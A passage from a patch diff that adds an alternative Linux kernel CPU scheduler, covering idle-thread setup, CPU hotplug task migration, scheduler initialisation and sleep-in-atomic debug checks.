-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
-+
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * reset the NMI-timeout, listing all files on a slow
-+		 * console might take a lot of time:
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
-+ * effective when the hotplug motion is down.
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and can't obviously be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task
-+	 * which kthread_is_per_cpu() and will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPUs hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in suspend
-+		 * resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do sync before park smpboot threads to take care the rcu boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do it's job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
-+
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take chance to reset time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+
-+static int __init migration_init(void)
-+{
-+	sched_cpu_starting(smp_processor_id());
-+	return 0;
-+}
-+early_initcall(migration_init);
-+
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state,
-+	 * since we will exit with TASK_RUNNING make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPU's synchronised, and interrupts disabled, the
-+ * and caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
